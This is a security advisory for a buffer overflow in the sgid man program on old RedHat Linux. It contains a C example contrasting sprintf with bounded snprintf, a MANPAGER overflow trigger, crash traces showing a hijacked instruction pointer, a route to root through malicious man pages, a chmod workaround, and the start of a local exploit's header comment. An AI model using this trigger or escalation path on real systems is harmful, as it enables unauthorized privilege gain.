RedHat man Buffer Overflow Vulnerability

2008-07-16T00:00:00
ID SSV:3658
Type seebug
Reporter Root
Modified 2008-07-16T00:00:00

Description

In most Linux distributions, /usr/bin/man is installed with the sgid man bit set. The bit exists so that man can create pre-formatted manual pages under /var/catman, which speeds up later access. However, the man program repeatedly uses sprintf to store user-supplied data into fixed-size buffers. A user can therefore supply overly long data to overflow such a buffer, gain the privileges of gid man, and possibly go on to obtain root privileges.
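The pattern the advisory describes is unbounded sprintf from an environment variable into a fixed-size buffer. The following is an added example, not code from the advisory or from the man sources: it shows that pattern beside a bounded replacement that uses snprintf and treats truncation as an error instead of silently running a mangled command. The function names, the 256-byte buffer size and the file path are assumptions.

```c
/* Added example (not the advisory's or man's code): unbounded sprintf
 * into a fixed-size buffer beside a bounded, truncation-checking form.
 * CMD_BUF_SIZE, the function names and the paths are assumptions. */
#include <stdio.h>
#include <string.h>

#define CMD_BUF_SIZE 256   /* assumed fixed-size buffer, as in the vulnerable pattern */

/* Vulnerable pattern: sprintf copies a caller-controlled string (think
 * $MANPAGER) into a fixed-size buffer with no length check, so a value
 * longer than the buffer overwrites adjacent memory. Shown only to contrast
 * with the bounded version; it is never called with long input here. */
void build_cmd_unsafe(char cmd[CMD_BUF_SIZE], const char *pager, const char *file)
{
    sprintf(cmd, "%s %s", pager, file);
}

/* Hardened form: snprintf bounds the write and returns the length the full
 * string would have needed. Returns 0 on success and -1 if the input does
 * not fit, leaving an empty string rather than a truncated command. */
int build_cmd_safe(char *cmd, size_t cmdsz, const char *pager, const char *file)
{
    int n = snprintf(cmd, cmdsz, "%s %s", pager, file);
    if (n < 0 || (size_t)n >= cmdsz) {
        if (cmdsz > 0)
            cmd[0] = '\0';
        return -1;
    }
    return 0;
}

/* Convenience wrapper: 1 if the pager value fits the fixed buffer, else 0. */
int pager_value_fits(const char *pager, const char *file)
{
    char cmd[CMD_BUF_SIZE];
    return build_cmd_safe(cmd, sizeof cmd, pager, file) == 0;
}

/* Constructs a 4000-byte run of 'A' (the same shape as the advisory's
 * MANPAGER test value) and reports 1 if the bounded builder rejects it. */
int long_value_rejected(void)
{
    char pager[4001];
    memset(pager, 'A', 4000);
    pager[4000] = '\0';
    return pager_value_fits(pager, "/tmp/ls.1") == 0;
}

int main(void)
{
    char cmd[CMD_BUF_SIZE];

    /* Safe only because this input is short; the point is that nothing
     * in build_cmd_unsafe enforces that. */
    build_cmd_unsafe(cmd, "less", "/tmp/ls.1");
    printf("unsafe builder, short input: %s\n", cmd);

    printf("bounded builder accepts short value: %d\n",
           pager_value_fits("less", "/tmp/ls.1"));
    printf("bounded builder rejects 4000-byte value: %d\n",
           long_value_rejected());
    return 0;
}
```

The check on `n >= cmdsz` matters: snprintf never overflows, but without it the caller would execute a command that was silently cut off, which is its own failure mode.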

For example, setting the MANPAGER variable to a string of more than 4000 'A' characters triggers the overflow:

$ MANPAGER=`perl -e '{print "A"x4000}'` man ls

[...]

1200 setuid(500) = 0
1200 setgid(15) = 0
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200 close(-1) = -1 EBADF (Bad file descriptor)
1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
1200 --- SIGSEGV (Naruszenie ochrony pami?ci) ---
1200 +++ killed by SIGSEGV +++

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

A user who obtains man gid privileges can read and write the /var/catman directory and some files under /usr/man. Normally the "man" files under /usr/man are not writable, but some programs may allow the man group to write their man pages. A user could therefore plant a malicious man page; when root views that program's man page, arbitrary code is executed and the malicious user may obtain root privileges.

Affected versions: RedHat Linux 6.2, 6.1, 6.0, 5.2, 5.1, 5.0, 4.2, 4.1, 4.0

Workaround: remove the sgid bit from /usr/bin/man with chmod g-s /usr/bin/man. (Note that man will then no longer be able to create pre-formatted man pages in /var/catman.)

/*  /usr/bin/man overflow local exploit for Linux.
 *  Tested in RedHat 6.1 (2.2.14),RedHat 6.0 (ALIGN=0)
 *  It will give you gid "man" privileges,now you can play
 *  with /var/catman.:-)
 *                       by warning3 <warning3